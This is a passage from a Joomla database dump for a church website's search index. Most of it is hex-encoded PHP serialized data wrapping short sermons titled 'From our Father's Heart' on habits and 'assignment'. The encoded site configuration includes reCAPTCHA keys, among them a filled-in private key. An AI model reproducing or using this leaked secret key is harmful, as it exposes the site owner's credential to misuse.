23b733a31353a227461674974656d43617465676f7279223b733a313a2231223b733a31353a227461674974656d526561644d6f7265223b733a313a2231223b733a31383a227461674974656d45787472614669656c6473223b733a313a2230223b733a31313a227461674f72646572696e67223b733a353a22616c706861223b733a31313a22746167466565644c696e6b223b733a313a2231223b733a31313a227461674665656449636f6e223b733a313a2231223b733a31363a2267656e657269634974656d436f756e74223b733a323a223130223b733a31363a2267656e657269634974656d5469746c65223b733a313a2231223b733a32323a2267656e657269634974656d5469746c654c696e6b6564223b733a313a2231223b733a32323a2267656e657269634974656d4461746543726561746564223b733a313a2231223b733a31363a2267656e657269634974656d496d616765223b733a313a2231223b733a32303a2267656e657269634974656d496e74726f54657874223b733a313a2231223b733a31393a2267656e657269634974656d43617465676f7279223b733a313a2231223b733a31393a2267656e657269634974656d526561644d6f7265223b733a313a2231223b733a32323a2267656e657269634974656d45787472614669656c6473223b733a313a2230223b733a31353a2267656e65726963466565644c696e6b223b733a313a2231223b733a31353a2267656e657269634665656449636f6e223b733a313a2231223b733a393a22666565644c696d6974223b733a323a223130223b733a31333a22666565644974656d496d616765223b733a313a2230223b733a31313a2266656564496d6753697a65223b733a313a2253223b733a31373a22666565644974656d496e74726f54657874223b733a313a2231223b733a31373a226665656454657874576f72644c696d6974223b733a303a22223b733a31363a22666565644974656d46756c6c54657874223b733a313a2231223b733a31323a22666565644974656d54616773223b733a313a2230223b733a31333a22666565644974656d566964656f223b733a313a2230223b733a31353a22666565644974656d47616c6c657279223b733a313a2230223b733a31393a22666565644974656d4174746163686d656e7473223b733a313a2230223b733a31343a2266656564426f677573456d61696c223b733a303a22223b733a31363a22696e74726f54657874436c65616e7570223b733a313a2230223b733a32373a22696e74726f54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32333a22696e74726f54657874436c65616e757054616741747472223b733a303a22223b733a31353a2266756c6c54657874436c65616e7570223b733a313a2230223b733a32363a2266756c6c54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32323a2266756c6c54657874436c65616e757054616741747472223b733a303a22223b733a31323a2278737346696c746572696e67223b733a313a2230223b733a31343a226c696e6b506f7075705769647468223b733a333a22393030223b733a31353a226c696e6b506f707570486569676874223b733a333a22363030223b733a31333a22696d616765735175616c697479223b733a333a22313030223b733a31313a226974656d496d6167655853223b733a323a223634223b733a31303a226974656d496d61676553223b733a333a22323030223b733a31303a226974656d496d6167654d223b733a333a22383536223b733a31303a226974656d496d6167654c223b733a333a22383536223b733a31313a226974656d496d616765584c223b733a333a22383536223b733a31363a226974656d496d61676547656e65726963223b733a333a22383536223b733a31333a22636174496d6167655769647468223b733a333a22313030223b733a31353a22636174496d61676544656661756c74223b733a313a2230223b733a31343a2275736572496d6167655769647468223b733a323a223634223b733a31363a2275736572496d61676544656661756c74223b733a313a2231223b733a31373a22636f6d6d656e746572496d675769647468223b733a323a223438223b733a31373a226f6e6c696e65496d616765456469746f72223b733a393a2273756d6f7061696e74223b733a31343a22696d61676554696d657374616d70223b733a313a2230223b733a31363a22696d6167654d656d6f72794c696d6974223b733a303a22223b733a31363a22736f6369616c427574746f6e436f6465223b733a303a22223b733a31353a2274776974746572557365726e616d65223b733a303a22223b733a31363a2266616365626f6f6b4d65746174616773223b733a313a2231223b733a31333a2266616365626f6f6b496d616765223b733a363a2258536d616c6c223b733a383a22636f6d6d656e7473223b733a313a2232223b733a31363a22636f6d6d656e74734f72646572696e67223b733a343a2244455343223b733a31333a22636f6d6d656e74734c696d6974223b733a323a223130223b733a32303a22636f6d6d656e7473466f726d506f736974696f6e223b733a353a2262656c6f77223b733a31383a22636f6d6d656e74735075626c697368696e67223b733a313a2231223b733a31373a22636f6d6d656e74735265706f7274696e67223b733a313a2232223b733a32333a22636f6d6d656e74735265706f7274526563697069656e74223b733a303a22223b733a32343a22696e6c696e65436f6d6d656e74734d6f6465726174696f6e223b733a313a2230223b733a383a226772617661746172223b733a313a2231223b733a383a22616e74697370616d223b733a393a22726563617074636861223b733a32323a22726563617074636861466f7252656769737465726564223b733a313a2231223b733a32303a22616b69736d6574466f7252656769737465726564223b733a313a2230223b733a31373a22636f6d6d656e7473466f726d4e6f746573223b733a313a2231223b733a32313a22636f6d6d656e7473466f726d4e6f74657354657874223b733a303a22223b733a31353a2266726f6e74656e6445646974696e67223b733a313a2231223b733a31323a2273686f77496d616765546162223b733a313a2231223b733a31393a2273686f77496d61676547616c6c657279546162223b733a313a2231223b733a31323a2273686f77566964656f546162223b733a313a2231223b733a31383a2273686f7745787472614669656c6473546162223b733a313a2231223b733a31383a2273686f774174746163686d656e7473546162223b733a313a2231223b733a31333a2273686f774b32506c7567696e73223b733a313a2231223b733a32323a2273696465426172446973706c617946726f6e74656e64223b733a313a2230223b733a31323a226d65726765456469746f7273223b733a313a2231223b733a31343a2273696465426172446973706c6179223b733a313a2231223b733a31373a226174746163686d656e7473466f6c646572223b733a303a22223b733a31363a2268696465496d706f7274427574746f6e223b733a313a2230223b733a31323a22676f6f676c65536561726368223b733a313a2230223b733a32313a22676f6f676c65536561726368436f6e7461696e6572223b733a31313a226b32436f6e7461696e6572223b733a31333a224b325573657250726f66696c65223b733a313a2230223b733a31313a224b325573657247726f7570223b733a313a2231223b733a383a227265646972656374223b733a333a22313038223b733a31313a2261646d696e536561726368223b733a363a2273696d706c65223b733a31323a22636f6f6b6965446f6d61696e223b733a303a22223b733a31363a2267617468657253746174697374696373223b733a313a2231223b733a31333a2274616767696e6753797374656d223b733a313a2231223b733a383a226c6f636b54616773223b733a313a2230223b733a31333a2273686f7754616746696c746572223b733a313a2230223b733a393a226b325461674e6f726d223b733a313a2230223b733a31333a226b325461674e6f726d43617365223b733a353a226c6f776572223b733a33313a226b325461674e6f726d4164646974696f6e616c5265706c6163656d656e7473223b733a303a22223b733a32303a227265636170746368615f7075626c69635f6b6579223b733a34303a22364c667869686b5541414141414d6354446653334b74436877475658796a5a69634a36665755514d223b733a32313a227265636170746368615f707269766174655f6b6579223b733a37323a22364c667869686b554141414141476a736f4f3955375f61324c693558364a5250484a6b73556d4555205374657020313a20636c69656e742d7369646520696e746567726174696f6e223b733a31353a227265636170746368615f7468656d65223b733a353a22636c65616e223b733a31313a227265636170746368615632223b733a313a2231223b733a32333a227265636170746368614f6e526567697374726174696f6e223b733a313a2231223b733a31333a22616b69736d65744170694b6579223b733a303a22223b733a31333a2273746f70466f72756d5370616d223b733a313a2230223b733a31393a2273746f70466f72756d5370616d4170694b6579223b733a303a22223b733a31383a2270726f66696c6550616765446973706c6179223b733a313a2230223b733a32313a2273686f774974656d73436f756e74657241646d696e223b733a313a2231223b733a31373a2273686f774368696c644361744974656d73223b733a313a2231223b733a32323a2264697361626c65436f6d706163744f72646572696e67223b733a313a2230223b733a31333a226d657461446573634c696d6974223b733a333a22313530223b733a32323a22656e666f7263655345465265706c6163656d656e7473223b733a313a2230223b733a31353a225345465265706c6163656d656e7473223b733a323736383a22c3807c412c20c3817c412c20c3827c412c20c3837c412c20c3847c412c20c3857c412c20c3a07c612c20c3a17c612c20c3a27c612c20c3a37c612c20c3a47c612c20c3a57c612c20c4807c412c20c4817c612c20c4827c412c20c4837c612c20c4847c412c20c4857c612c20c3877c432c20c3a77c632c20c4867c432c20c4877c632c20c4887c432c20c4897c632c20c48a7c432c20c48b7c632c20c48c7c432c20c48d7c632c20c3907c442c20c3b07c642c20c48e7c442c20c48f7c642c20c4907c442c20c4917c642c20c3887c452c20c3897c452c20c38a7c452c20c38b7c452c20c3a87c652c20c3a97c652c20c3aa7c652c20c3ab7c652c20c4927c452c20c4937c652c20c4947c452c20c4957c652c20c4967c452c20c4977c652c20c4987c452c20c4997c652c20c49a7c452c20c49b7c652c20c49c7c472c20c49d7c672c20c49e7c472c20c49f7c672c20c4a07c472c20c4a17c672c20c4a27c472c20c4a37c672c20c4a47c482c20c4a57c682c20c4a67c482c20c4a77c682c20c38c7c492c20c38d7c492c20c38e7c492c20c38f7c492c20c3ac7c692c20c3ad7c692c20c3ae7c692c20c3af7c692c20c4a87c492c20c4a97c692c20c4aa7c492c20c4ab7c692c20c4ac7c492c20c4ad7c692c20c4ae7c492c20c4af7c692c20c4b07c492c20c4b17c692c20c4b47c4a2c20c4b57c6a2c20c4b67c4b2c20c4b77c6b2c20c4b87c6b2c20c4b97c4c2c20c4ba7c6c2c20c4bb7c4c2c20c4bc7c6c2c20c4bd7c4c2c20c4be7c6c2c20c4bf7c4c2c20c5807c6c2c20c5817c4c2c20c5827c6c2c20c3917c4e2c20c3b17c6e2c20c5837c4e2c20c5847c6e2c20c5857c4e2c20c5867c6e2c20c5877c4e2c20c5887c6e2c20c5897c6e2c20c58a7c4e2c20c58b7c6e2c20c3927c4f2c20c3937c4f2c20c3947c4f2c20c3957c4f2c20c3967c4f2c20c3987c4f2c20c3b27c6f2c20c3b37c6f2c20c3b47c6f2c20c3b57c6f2c20c3b67c6f2c20c3b87c6f2c20c58c7c4f2c20c58d7c6f2c20c58e7c4f2c20c58f7c6f2c20c5907c4f2c20c5917c6f2c20c5947c522c20c5957c722c20c5967c522c20c5977c722c20c5987c522c20c5997c722c20c59a7c532c20c59b7c732c20c59c7c532c20c59d7c732c20c59e7c532c20c59f7c732c20c5a07c532c20c5a17c732c20c5bf7c732c20c5a27c542c20c5a37c742c20c5a47c542c20c5a57c742c20c5a67c542c20c5a77c742c20c3997c552c20c39a7c552c20c39b7c552c20c39c7c552c20c3b97c752c20c3ba7c752c20c3bb7c752c20c3bc7c752c20c5a87c552c20c5a97c752c20c5aa7c552c20c5ab7c752c20c5ac7c552c20c5ad7c752c20c5ae7c552c20c5af7c752c20c5b07c552c20c5b17c752c20c5b27c552c20c5b37c752c20c5b47c572c20c5b57c772c20c39d7c592c20c3bd7c792c20c3bf7c792c20c5b67c592c20c5b77c792c20c5b87c592c20c5b97c5a2c20c5ba7c7a2c20c5bb7c5a2c20c5bc7c7a2c20c5bd7c5a2c20c5be7c7a2c20ceb17c612c20ceb27c622c20ceb37c672c20ceb47c642c20ceb57c652c20ceb67c7a2c20ceb77c682c20ceb87c74682c20ceb97c692c20ceba7c6b2c20cebb7c6c2c20cebc7c6d2c20cebd7c6e2c20cebe7c782c20cebf7c6f2c20cf807c702c20cf817c722c20cf837c732c20cf847c742c20cf857c792c20cf867c662c20cf877c63682c20cf887c70732c20cf897c772c20ce917c412c20ce927c422c20ce937c472c20ce947c442c20ce957c452c20ce967c5a2c20ce977c482c20ce987c54682c20ce997c492c20ce9a7c4b2c20ce9b7c4c2c20ce9c7c4d2c20ce9e7c582c20ce9f7c4f2c20cea07c502c20cea17c522c20cea37c532c20cea47c542c20cea57c592c20cea67c462c20cea77c43682c20cea87c50732c20cea97c572c20ceac7c612c20cead7c652c20ceae7c682c20ceaf7c692c20cf8c7c6f2c20cf8d7c792c20cf8e7c772c20ce867c412c20ce887c452c20ce897c482c20ce8a7c492c20ce8c7c4f2c20ce8e7c592c20ce8f7c572c20cf8a7c692c20ce907c692c20cf8b7c792c20cf827c732c20d0907c412c20d3907c412c20d3927c412c20d3987c452c20d39a7c452c20d3947c452c20d0917c422c20d0927c562c20d0937c472c20d2907c472c20d0837c472c20d2927c472c20d3b67c472c20797c592c20d0947c442c20d0957c452c20d0807c452c20d0817c594f2c20d3967c452c20d2bc7c452c20d2be7c452c20d0847c59452c20d0967c5a482c20d3817c445a482c20d2967c5a482c20d39c7c445a482c20d0977c5a2c20d2987c5a2c20d39e7c445a2c20d3a07c445a2c20d0857c445a2c20d0987c492c20d08d7c492c20d3a47c492c20d3a27c492c20d0867c492c20d0877c4a492c20d3807c492c20d0997c592c20d28a7c592c20d0887c4a2c20d09a7c4b2c20d29a7c512c20d29e7c512c20d2a07c4b2c20d3837c512c20d29c7c4b2c20d09b7c4c2c20d3857c4c2c20d0897c4c2c20d09c7c4d2c20d38d7c4d2c20d09d7c4e2c20d3897c4e2c20d2a27c4e2c20d3877c4e2c20d2a47c4e2c20d08a7c4e2c20d09e7c4f2c20d3a67c4f2c20d3a87c4f2c20d3aa7c4f2c20d2a87c4f2c20d09f7c502c20d2a67c50462c20d0a07c502c20d28e7c502c20d0a17c532c20d2aa7c532c20d0a27c542c20d2ac7c54482c20d08b7c542c20d08c7c4b2c20d0a37c552c20d08e7c552c20d3b27c552c20d3b07c552c20d3ae7c552c20d2ae7c552c20d2b07c552c20d0a47c462c20d0a57c482c20d2b27c482c20d2ba7c482c20d0a67c54532c20d2b47c54532c20d0a77c43482c20d3b47c43482c20d2b67c43482c20d38b7c43482c20d2b87c43482c20d08f7c445a2c20d0a87c53482c20d0a97c5348542c20d0aa7c412c20d0ab7c592c20d3b87c592c20d0ac7c592c20d28c7c592c20d0ad7c452c20d3ac7c452c20d0ae7c59552c20d0af7c59412c20d0b07c612c20d3917c612c20d3937c612c20d3997c652c20d39b7c652c20d3957c652c20d0b17c622c20d0b27c762c20d0b37c672c20d2917c672c20d1937c672c20d2937c672c20d3b77c672c20797c792c20d0b47c642c20d0b57c652c20d1907c652c20d1917c796f2c20d3977c652c20d2bd7c652c20d2bf7c652c20d1947c79652c20d0b67c7a682c20d3827c647a682c20d2977c7a682c20d39d7c647a682c20d0b77c7a2c20d2997c7a2c20d39f7c647a2c20d3a17c647a2c20d1957c647a2c20d0b87c692c20d19d7c692c20d3a57c692c20d3a37c692c20d1967c692c20d1977c6a692c20d3807c692c20d0b97c792c20d28b7c792c20d1987c6a2c20d0ba7c6b2c20d29b7c712c20d29f7c712c20d2a17c6b2c20d3847c712c20d29d7c6b2c20d0bb7c6c2c20d3867c6c2c20d1997c6c2c20d0bc7c6d2c20d38e7c6d2c20d0bd7c6e2c20d38a7c6e2c20d2a37c6e2c20d3887c6e2c20d2a57c6e2c20d19a7c6e2c20d0be7c6f2c20d3a77c6f2c20d3a97c6f2c20d3ab7c6f2c20d2a97c6f2c20d0bf7c702c20d2a77c70662c20d1807c702c20d28f7c702c20d1817c732c20d2ab7c732c20d1827c742c20d2ad7c74682c20d19b7c742c20d19c7c6b2c20d1837c752c20d19e7c752c20d3b37c752c20d3b17c752c20d3af7c752c20d2af7c752c20d2b17c752c20d1847c662c20d1857c682c20d2b37c682c20d2bb7c682c20d1867c74732c20d2b57c74732c20d1877c63682c20d3b57c63682c20d2b77c63682c20d38c7c63682c20d2b97c63682c20d19f7c647a2c20d1887c73682c20d1897c7368742c20d18a7c612c20d18b7c792c20d3b97c792c20d18c7c792c20d28d7c792c20d18d7c652c20d3ad7c652c20d18e7c79752c20d18f7c7961223b733a353a226b32536566223b733a313a2230223b733a31333a226b325365664c6162656c436174223b733a373a22636f6e74656e74223b733a31333a226b325365664c6162656c546167223b733a333a22746167223b733a31343a226b325365664c6162656c55736572223b733a363a22617574686f72223b733a31363a226b325365664c6162656c536561726368223b733a363a22736561726368223b733a31343a226b325365664c6162656c44617465223b733a343a2264617465223b733a31343a226b325365664c6162656c4974656d223b733a313a2230223b733a32363a226b325365664c6162656c4974656d437573746f6d507265666978223b733a303a22223b733a31373a226b32536566496e736572744974656d4964223b733a313a2231223b733a32343a226b325365664974656d49645469746c65416c696173536570223b733a343a2264617368223b733a32323a226b325365665573654974656d5469746c65416c696173223b733a313a2231223b733a31363a226b32536566496e736572744361744964223b733a313a2231223b733a32333a226b3253656643617449645469746c65416c696173536570223b733a343a2264617368223b733a32313a226b325365665573654361745469746c65416c696173223b733a313a2231223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a373a226d6574616b6579223b733a303a22223b733a383a226d65746164657363223b733a303a22223b733a383a226d65746164617461223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a323a7b733a363a22726f626f7473223b733a303a22223b733a363a22617574686f72223b733a303a22223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a383a226f72646572696e67223b733a323a223130223b733a353a227472617368223b733a313a2230223b733a393a226361745f7472617368223b733a313a2230223b733a383a2263617465676f7279223b733a31343a224661746865722773204865617274223b733a393a226361745f7374617465223b733a313a2231223b733a31303a226361745f616363657373223b733a313a2231223b733a31393a2265787472615f6669656c64735f736561726368223b733a303a22223b733a31323a2265787472615f6669656c6473223b733a323a225b5d223b733a343a22736c7567223b733a33373a2232393a66726f6d2d6f75722d6661746865722d732d68656172742d30352d30332d32303137223b733a373a22636174736c7567223b733a31363a22353a6661746865722d732d6865617274223b733a363a22617574686f72223b733a393a224c6966656f61736973223b733a363a226c61796f7574223b733a343a226974656d223b733a343a2270617468223b733a35353a22636f6d706f6e656e742f6b322f6974656d2f32392d66726f6d2d6f75722d6661746865722d732d68656172742d30352d30332d32303137223b733a31303a226d657461617574686f72223b4e3b7d733a31353a22002a00696e737472756374696f6e73223b613a353a7b693a313b613a333a7b693a303b733a353a227469746c65223b693a313b733a383a227375627469746c65223b693a323b733a323a226964223b7d693a323b613a323a7b693a303b733a373a2273756d6d617279223b693a313b733a343a22626f6479223b7d693a333b613a393a7b693a303b733a343a226d657461223b693a313b733a31303a226c6973745f7072696365223b693a323b733a31303a2273616c655f7072696365223b693a333b733a373a226d6574616b6579223b693a343b733a383a226d65746164657363223b693a353b733a31303a226d657461617574686f72223b693a363b733a363a22617574686f72223b693a373b733a31363a22637265617465645f62795f616c696173223b693a383b733a31393a2265787472615f6669656c64735f736561726368223b7d693a343b613a323a7b693a303b733a343a2270617468223b693a313b733a353a22616c696173223b7d693a353b613a313a7b693a303b733a383a22636f6d6d656e7473223b7d7d733a31313a22002a007461786f6e6f6d79223b613a353a7b733a343a2254797065223b613a313a7b733a373a224b32204974656d223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a373a224b32204974656d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a363a22417574686f72223b613a313a7b733a393a224c6966656f61736973223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a393a224c6966656f61736973223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31313a224b322043617465676f7279223b613a313a7b733a31343a224661746865722773204865617274223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a31343a224661746865722773204865617274223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a383a224c616e6775616765223b613a313a7b733a313a222a223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a313a222a223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31323a224578747261206669656c6473223b613a313a7b733a323a225b5d223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a323a225b5d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d7d733a333a2275726c223b733a33393a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d3239223b733a353a22726f757465223b733a37343a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d32393a66726f6d2d6f75722d6661746865722d732d68656172742d30352d30332d32303137223b733a353a227469746c65223b733a33363a2246726f6d206f7572204661746865722773204865617274202830352f30332f3230313729223b733a31313a226465736372697074696f6e223b733a3437393a2220446561726c792062656c6f766564206f6620476f642c204c657420796f757220747261696e696e6720696e2074686520447265616d2043656e747265206265636f6d6520796f7572206861626974732e2057686174206861626974732061726520796f752063756c7469766174696e6720696e20796f7572206c6966653f205468652068616269747320796f7520616c6c6f7720746f2067726f7720616e642066657374657220696e20796f7572206c6966652077696c6c2064657465726d696e6520776865726520796f752061727269766520696e20796f75722064657374696e79206a6f75726e65792e20596f757220686162697473206172652076656869636c657320746861742064657465726d696e6520776865726520796f75206576656e7475616c6c7920656e6420757020696e206c69666520616e642064657374696e792e204c657420796f757220747261696e696e6720696e2074686520447265616d2043656e747265206265636f6d6520796f75722068616269742e20546865204c6f72642068617320746f6c6420757320746861742074686520447265616d2043656e747265206973206e6f74206a7573742061206368757263682c2074686520447265616d2043656e74726520697320747261696e696e672e20223b733a393a227075626c6973686564223b4e3b733a353a227374617465223b693a313b733a363a22616363657373223b733a313a2231223b733a383a226c616e6775616765223b733a313a222a223b733a31383a227075626c6973685f73746172745f64617465223b733a31393a22323031372d30332d30352030383a33383a3132223b733a31363a227075626c6973685f656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a2273746172745f64617465223b733a31393a22323031372d30332d30352030383a33383a3132223b733a383a22656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a226c6973745f7072696365223b4e3b733a31303a2273616c655f7072696365223b4e3b733a373a22747970655f6964223b693a323b733a31353a2264656661756c744c616e6775616765223b733a353a22656e2d4742223b7d);
INSERT INTO `y57u5_finder_links` (`link_id`, `url`, `route`, `title`, `description`, `indexdate`, `md5sum`, `published`, `state`, `access`, `language`, `publish_start_date`, `publish_end_date`, `start_date`, `end_date`, `list_price`, `sale_price`, `type_id`, `object`) VALUES
(261, 'index.php?option=com_k2&view=item&id=30', 'index.php?option=com_k2&view=item&id=30:from-our-father-s-heart-12-03-2017', 'From our Father\'s Heart (12/03/2017)', ' Dearly Beloved, I want to share with you today on some critical truths about assignment. God does not look at how successful men are in business in rating how successful they are, rather he looks at how responsible they are in handling assignments. Assignment is different from ministry, and you must never confuse the two. A man can have a ministry but without assignment, such men don’t last and eventually God will withdraw the ministry. ', '2017-06-25 14:19:35', 'ca79ac5d84030c638ad22cc8fa6fd3c4', 1, 1, 1, '*', '2017-03-12 16:51:41', '0000-00-00 00:00:00', '2017-03-12 16:51:41', '0000-00-00 00:00:00', 0, 0, 2, 0x4f3a31393a2246696e646572496e6465786572526573756c74223a31393a7b733a31313a22002a00656c656d656e7473223b613a32373a7b733a323a226964223b733a323a223330223b733a353a22616c696173223b733a33343a2266726f6d2d6f75722d6661746865722d732d68656172742d31322d30332d32303137223b733a373a2273756d6d617279223b733a3435393a223c703e446561726c792042656c6f7665642c3c2f703e0d0a3c703e492077616e7420746f207368617265207769746820796f7520746f646179206f6e20736f6d6520637269746963616c207472757468732061626f75742061737369676e6d656e742e20476f6420646f6573206e6f74206c6f6f6b20617420686f77207375636365737366756c206d656e2061726520696e20627573696e65737320696e20726174696e6720686f77207375636365737366756c2074686579206172652c20726174686572206865206c6f6f6b7320617420686f7720726573706f6e7369626c6520746865792061726520696e2068616e646c696e672061737369676e6d656e74732e2041737369676e6d656e7420697320646966666572656e742066726f6d206d696e69737472792c20616e6420796f75206d757374206e6576657220636f6e66757365207468652074776f2e2041206d616e2063616e20686176652061206d696e69737472792062757420776974686f75742061737369676e6d656e742c2073756368206d656e20646f6ee2809974206c61737420616e64206576656e7475616c6c7920476f642077696c6c20776974686472617720746865206d696e69737472792e3c2f703e0d0a223b733a343a22626f6479223b733a323931343a220d0a3c703e596f75206d7573742074616b652061737369676e6d656e7420696e205a696f6e20736572696f75732e2041737369676e6d656e74206973207768617420646576656c6f707320796f757220706f74656e7469616c2e20496e206c6966652c206e6f626f64792070726f6d6f74657320612073747564656e742074686174206973206e6f742074616b696e672061737369676e6d656e747320736572696f75732e205768792073686f756c6420796f752070726f6d6f7465206120737465776172642077686f206973206e6f742074616b696e672061737369676e6d656e747320736572696f75733f20546861742077696c6c20626520656e7468726f6e656d656e74206f66206d6564696f63726974792e3c2f703e0d0a3c703e5468657265206172652074776f206b696e6473206f6620626174746c657320696e206c6966653b204920464947485420424154544c455320616e6420574520464947485420424154544c45532e205768617420796f7520646f2077697468207468652061737369676e6d656e7420796f752061726520676976656e20696e20746865206b696e67646f6d206973207768617420707265706172657320796f7520666f7220746865204920464947485420424154544c4553206f6620796f7572206c6966652e20492077616e7420796f7520746f2074616b6520796f75722061737369676e6d656e7420736572696f75732c206e6f7420666f72207468652073616b65206f66206d696e6973747279206275742062656361757365206f6620796f757220706572736f6e616c20626174746c65732ec2a03c2f703e0d0a3c703e54686572652061726520736f6d65206f6620796f7520776f6d656e207468617420796f75722064656c697665726965732077696c6c206265206d616e69666573746174696f6e73206f6620766963746f72792e20596f752073686f756c64206e6f742073746f702070726179696e67207768696c6520796f752061726520707265676e616e742e3c2f703e0d0a3c703e5768617420796f7520646f207769746820796f75722061737369676e6d656e742077696c6c2065697468657220637265617465206f722064657374726f7920796f7572206675747572652e205768656e20476f642077616e747320746f2070726f6d6f74652061206d616e2c2048652067697665732068696d2061737369676e6d656e742e20466169746866756c6e65737320776974682061737369676e6d656e7420697320776861742064657465726d696e657320696620686520697320726561647920666f722070726f6d6f74696f6e206f72206e6f742e20596f7520617265206e6f7420726561647920666f7220706f7374696e6720756e74696c20796f7520686176652070617373656420736572696f75732061737369676e6d656e74732e20497420646f65736ee2809974206d617474657220746865207469746c6520796f752063617272792c2069742069732061737369676e6d656e742074686174207375737461696e7320796f75206e6f74207469746c652e20496620796f75722061737369676e6d656e7420697320746f20636c65616e20746865206368757263682c20646f2069742077656c6c3b20697420697320646f696e6720736f6d657468696e6720746f20796f7572207370697269742e2057686174206973207468652061737369676e6d656e7420796f752061726520676976656e20696e205a696f6e3f20596f75206d757374206170706c792064696c6967656e636520616e6420736572696f75736e65737320746f2069742ec2a03c2f703e0d0a3c703e476f20616e642061736b2053616d736f6e207768656e206865206465636964656420746f20626520636172656c65737320776974682061737369676e6d656e742e2044656c696c61682073686f77656420757020616e642064616d61676564206869732064657374696e7920736572696f75736c792e204a6f7365706820746f6f6b2061737369676e6d656e7420736572696f75732c20616e6420746861742077617320686973207361666574792e20446176696420686164206265656e2074616b696e672061737369676e6d656e7420736572696f7573206265666f726520476f6c69617468e280997320626174746c652073686f7765642075702e20476f6c69617468e280997320626174746c6520697320612070726f6d6f74696f6e20626174746c652e204865206469646ee2809974206661696c20626563617573652068652077617320736572696f757320776974682061737369676e6d656e742e205768656e20796f75722070726f6d6f74696f6e20626174746c652073686f77732075702c20696e20776861742073746174652077696c6c206974206d65657420796f753f20476f6420646f65736ee280997420676976652068616e642d6f7574732c2048652067697665732061737369676e6d656e74732e20476f6420646f65736ee28099742067697665207469746c65732c2048652067697665732061737369676e6d656e742e205768656e20476f642077616e747320746f206368616e676520796f7572206c6576656c2c20486520676976657320796f752061737369676e6d656e74732e3c2f703e0d0a3c703e496e20447265616d2043656e7472652c20686f7720646f20796f75206b6e6f7720796f752061726520646f696e672066696e653f20436865636b207468652061737369676e6d656e7420796f7520617265206265696e6720676976656e2e2054686520706f696e74657220746f206b6e6f7720796f752061726520646f696e672077656c6c2073706972697475616c6c792069732061737369676e6d656e742e2049662061737369676e6d656e74206973206265696e672077697468647261776e2066726f6d20796f752c2069742073686f777320796f7520617265206e6f7420646f696e6720746f6f2077656c6c2e2041737369676e6d656e7420697320776861742064657465726d696e657320796f7572206675747572652e2049742073686f777320796f7520796f75722066757475726520696e20476f642e20496620796f75206661696c20696e2061737369676e6d656e742c20796f7572206d696e69737472792077696c6c2062652077697468647261776e2e2053746f70206c6f6f6b696e6720666f722072656c6576616e636520696e20746865206b696e67646f6d2e2054616b6520796f75722061737369676e6d656e7420736572696f75732e2041737369676e6d656e742069732077686174206765747320796f7520726561647920666f72206d696e69737472792e2041737369676e6d656e7420697320776861742070726570617265732075732074696c6c207768656e20476f6420636f6d657320666f722075732ec2a03c2f703e0d0a3c703e4920616d20736179696e672074686973206265636175736520476f6420746f6c64206d6520746f2074656c6c20796f7520746f2074616b6520796f75722061737369676e6d656e7420736572696f75732e20536f6d657468696e6720697320746f20626520616464656420746f20796f75722073706972697420617320796f75206769766520796f757273656c6620746f20796f75722061737369676e6d656e742e20446f6e2774206a757374206265206865726520666f722073686f772062757420666f72207265616c2e204769766520796f7572206265737420746f2061737369676e6d656e742c20616e642069742077696c6c206d616b6520616c6c2074686520646966666572656e636520696e20796f7572206a6f75726e657920617320612062656c69657665722e3c2f703e0d0a3c703e54696c6c206e657874207765656b2c20676f20616e642077696e2077697468204a657375732e3c2f703e0d0a3c703e476f64e28099732053657276616e743c2f703e0d0a3c703e5265762e204f6c75736f6c61204172656f67756e2e3c2f703e0d0a3c703ec2a03c2f703e0d0a3c703ec2a03c2f703e223b733a353a226361746964223b733a313a2235223b733a31303a22637265617465645f6279223b733a333a22313936223b733a31363a22637265617465645f62795f616c696173223b733a303a22223b733a383a226d6f646966696564223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31313a226d6f6469666965645f6279223b733a313a2230223b733a363a22706172616d73223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a3135323a7b733a31303a22656e61626c655f637373223b733a313a2230223b733a31343a226a517565727948616e646c696e67223b733a313a2230223b733a32313a226261636b656e644a517565727948616e646c696e67223b733a353a226c6f63616c223b733a383a22757365724e616d65223b733a313a2230223b733a393a2275736572496d616765223b733a313a2230223b733a31353a22757365724465736372697074696f6e223b733a313a2230223b733a373a227573657255524c223b733a313a2231223b733a393a2275736572456d61696c223b733a313a2230223b733a31323a2275736572466565644c696e6b223b733a313a2230223b733a31323a22757365724665656449636f6e223b733a313a2231223b733a31333a22757365724974656d436f756e74223b733a323a223130223b733a31333a22757365724974656d5469746c65223b733a313a2231223b733a31393a22757365724974656d5469746c654c696e6b6564223b733a313a2231223b733a31393a22757365724974656d4461746543726561746564223b733a313a2231223b733a31333a22757365724974656d496d616765223b733a313a2231223b733a31373a22757365724974656d496e74726f54657874223b733a313a2231223b733a31363a22757365724974656d43617465676f7279223b733a313a2230223b733a31323a22757365724974656d54616773223b733a313a2231223b733a32323a22757365724974656d436f6d6d656e7473416e63686f72223b733a313a2231223b733a313